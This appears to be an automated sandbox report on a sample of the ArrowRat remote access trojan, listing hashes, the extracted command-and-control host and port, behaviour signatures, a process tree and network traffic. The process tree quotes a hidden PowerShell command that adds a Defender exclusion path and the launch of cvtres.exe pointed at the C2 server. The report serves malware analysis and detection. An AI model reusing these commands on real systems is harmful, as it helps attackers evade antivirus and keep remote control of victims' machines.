Overview

overview

10

Static

static

10

Client.exe

windows7-x64

10

Client.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26/12/2024, 16:20 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Client.exe

  • Size

    158KB

  • MD5

    b9e38162af37c0f29b683c3c307fae6c

  • SHA1

    646eedd6062086bb394c5f5727ff3cfff940e090

  • SHA256

    d020ce862bf6ba26a1b4b0ca76ebc2ce9bc5ade16e52c66b11bc4253a16318a7

  • SHA512

    85440ad4b1258171ddd280e373b31ea2018538256c21ff024d138f4032bb4717875351073fd987e2c0e120f7dbea5bfc9cf32484224e2c04685a13916b8e44b5

  • SSDEEP

    3072:Mbz3H+0OoCthfbEFtbcfjF45gjryKKqH6JY2doszEmQotEPPcfPmOO8Y:Mbz3e0ODhTEPgnjuIJzo+PPcfPmB8

Score
10/10
arrowratclientdiscoveryexecutionpersistencerat

Malware Config

Extracted

Family

arrowrat

Botnet

Client

C2

24.ip.gl.ply.gg:46885

Mutex

BVCkbzdsT

Signatures

  • ArrowRat

    Remote access tool with various capabilities first seen in late 2021.

    ratarrowrat
  • Arrowrat family
    arrowrat
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
    persistence
  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

    persistence
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks SCSI registry key(s) 3 TTPs 22 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 37 IoCs
  • Suspicious use of FindShellTrayWindow 49 IoCs
  • Suspicious use of SendNotifyMessage 21 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\Client.exe
    "C:\Users\Admin\AppData\Local\Temp\Client.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2256
    • C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      2⤵
      • Boot or Logon Autostart Execution: Active Setup
      • Enumerates connected drives
      • Checks SCSI registry key(s)
      • Modifies registry class
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:2588
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 24.ip.gl.ply.gg 46885 BVCkbzdsT
      2⤵
        PID:3740
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 24.ip.gl.ply.gg 46885 BVCkbzdsT
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:2076
      • C:\Windows\System32\ComputerDefaults.exe
        "C:\Windows\System32\ComputerDefaults.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4876
        • C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
          "PowerShell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Pan\dora'
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1056
    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
      1⤵
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:1260
    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
      1⤵
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:4300

    Network

    • flag-us
      DNS
      241.150.49.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      241.150.49.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      181.129.81.91.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      181.129.81.91.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      24.ip.gl.ply.gg
      cvtres.exe
      Remote address:
      8.8.8.8:53
      Request
      24.ip.gl.ply.gg
      IN A
      Response
      24.ip.gl.ply.gg
      IN A
      147.185.221.24
    • flag-us
      DNS
      24.221.185.147.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      24.221.185.147.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      23.159.190.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      23.159.190.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      95.221.229.192.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      95.221.229.192.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      104.219.191.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      104.219.191.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      196.249.167.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      196.249.167.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      50.23.12.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      50.23.12.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      241.42.69.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      241.42.69.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      92.12.20.2.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      92.12.20.2.in-addr.arpa
      IN PTR
      Response
      92.12.20.2.in-addr.arpa
      IN PTR
      a2-20-12-92deploystaticakamaitechnologiescom
    • flag-us
      DNS
      81.144.22.2.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      81.144.22.2.in-addr.arpa
      IN PTR
      Response
      81.144.22.2.in-addr.arpa
      IN PTR
      a2-22-144-81deploystaticakamaitechnologiescom
    • flag-us
      DNS
      172.210.232.199.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      172.210.232.199.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      19.229.111.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      19.229.111.52.in-addr.arpa
      IN PTR
      Response
    • 147.185.221.24:46885
      24.ip.gl.ply.gg
      cvtres.exe
      410 B
       236 B
       5
      5
    • 147.185.221.24:46885
      24.ip.gl.ply.gg
      cvtres.exe
      410 B
       236 B
       5
      5
    • 147.185.221.24:46885
      24.ip.gl.ply.gg
      cvtres.exe
      410 B
       236 B
       5
      5
    • 147.185.221.24:46885
      24.ip.gl.ply.gg
      cvtres.exe
      502 B
       276 B
       7
      6
    • 147.185.221.24:46885
      24.ip.gl.ply.gg
      cvtres.exe
      3.3kB
       17.2kB
       67
      66
    • 8.8.8.8:53
      241.150.49.20.in-addr.arpa
      dns
      72 B
       158 B
       1
      1

      DNS Request

      241.150.49.20.in-addr.arpa

    • 8.8.8.8:53
      181.129.81.91.in-addr.arpa
      dns
      72 B
       147 B
       1
      1

      DNS Request

      181.129.81.91.in-addr.arpa

    • 8.8.8.8:53
      24.ip.gl.ply.gg
      dns
      cvtres.exe
      61 B
       77 B
       1
      1

      DNS Request

      24.ip.gl.ply.gg

      DNS Response

      147.185.221.24

    • 8.8.8.8:53
      24.221.185.147.in-addr.arpa
      dns
      73 B
       130 B
       1
      1

      DNS Request

      24.221.185.147.in-addr.arpa

    • 8.8.8.8:53
      23.159.190.20.in-addr.arpa
      dns
      72 B
       158 B
       1
      1

      DNS Request

      23.159.190.20.in-addr.arpa

    • 8.8.8.8:53
      95.221.229.192.in-addr.arpa
      dns
      73 B
       144 B
       1
      1

      DNS Request

      95.221.229.192.in-addr.arpa

    • 8.8.8.8:53
      104.219.191.52.in-addr.arpa
      dns
      73 B
       147 B
       1
      1

      DNS Request

      104.219.191.52.in-addr.arpa

    • 8.8.8.8:53
      196.249.167.52.in-addr.arpa
      dns
      73 B
       147 B
       1
      1

      DNS Request

      196.249.167.52.in-addr.arpa

    • 8.8.8.8:53
      50.23.12.20.in-addr.arpa
      dns
      70 B
       156 B
       1
      1

      DNS Request

      50.23.12.20.in-addr.arpa

    • 8.8.8.8:53
      241.42.69.40.in-addr.arpa
      dns
      71 B
       145 B
       1
      1

      DNS Request

      241.42.69.40.in-addr.arpa

    • 8.8.8.8:53
      92.12.20.2.in-addr.arpa
      dns
      69 B
       131 B
       1
      1

      DNS Request

      92.12.20.2.in-addr.arpa

    • 8.8.8.8:53
      81.144.22.2.in-addr.arpa
      dns
      70 B
       133 B
       1
      1

      DNS Request

      81.144.22.2.in-addr.arpa

    • 8.8.8.8:53
      172.210.232.199.in-addr.arpa
      dns
      74 B
       128 B
       1
      1

      DNS Request

      172.210.232.199.in-addr.arpa

    • 8.8.8.8:53
      19.229.111.52.in-addr.arpa
      dns
      72 B
       158 B
       1
      1

      DNS Request

      19.229.111.52.in-addr.arpa

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133797036470114333.txt
      Filesize

      75KB

      MD5

      75782663c3b084f4bb097e6cb088009a

      SHA1

      2909c4df6dcaf558439f892ab0ef5ebd2937ee76

      SHA256

      3cbd83a0b4f633144075b007ae1366eb2636c389fddc240c483de96a66340e60

      SHA512

      9c702a3014a80b7d42d9662e2eb9c24df1a4cf60c920e95c0c4d543ad83cb80b414710920d3bb0cd7dd0193ad66455f267660a698dd4edcc20035b26467c8256

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_axgtqagc.ou5.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Roaming\temp0923
      Filesize

      10B

      MD5

      bf12ed71b468aff29171838e05b5ff68

      SHA1

      bc5fa6b614279570e6eb10dd7d68e56d8d5b955e

      SHA256

      c6413eb4d233caa14215d0cefc029f1063be03765e5f2f52bd6638ab8da00506

      SHA512

      9d09dd93ec4fe7e4e63b79fe607de534b7977d8e53cbcef7ba199b421e14734c50dfcfae18101f21de9a10c774eec4456852b8c67f74fb36d7a3f2f6fb8cc33b

      Download Submit

    • memory/1056-25-0x000001FC43A90000-0x000001FC43AB2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/1056-28-0x000001FC43B60000-0x000001FC43D7C000-memory.dmp

      Filesize

      2.1MB

      Download

    • memory/2076-6-0x0000000006160000-0x0000000006704000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/2076-2-0x0000000000400000-0x0000000000418000-memory.dmp

      Filesize

      96KB

      Download

    • memory/2076-10-0x0000000006810000-0x0000000006860000-memory.dmp

      Filesize

      320KB

      Download

    • memory/2076-5-0x00000000057F0000-0x000000000588C000-memory.dmp

      Filesize

      624KB

      Download

    • memory/2076-4-0x0000000005750000-0x00000000057E2000-memory.dmp

      Filesize

      584KB

      Download

    • memory/2076-7-0x0000000005F60000-0x0000000005FC6000-memory.dmp

      Filesize

      408KB

      Download

    • memory/2256-15-0x00007FF8BCC80000-0x00007FF8BD741000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2256-0-0x00007FF8BCC83000-0x00007FF8BCC85000-memory.dmp

      Filesize

      8KB

      Download

    • memory/2256-1-0x000001B7F9D40000-0x000001B7F9D6E000-memory.dmp

      Filesize

      184KB

      Download

    • memory/2256-203-0x00007FF8BCC80000-0x00007FF8BD741000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2588-32-0x0000000003230000-0x0000000003231000-memory.dmp

      Filesize

      4KB

      Download

    • memory/4300-50-0x000001B536F40000-0x000001B536F60000-memory.dmp

      Filesize

      128KB

      Download

    • memory/4300-35-0x000001B536000000-0x000001B536100000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/4300-33-0x000001B536000000-0x000001B536100000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/4300-38-0x000001B536F80000-0x000001B536FA0000-memory.dmp

      Filesize

      128KB

      Download

    • memory/4300-65-0x000001B537350000-0x000001B537370000-memory.dmp

      Filesize

      128KB

      Download

    • memory/4300-34-0x000001B536000000-0x000001B536100000-memory.dmp

      Filesize

      1024KB

      Download

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.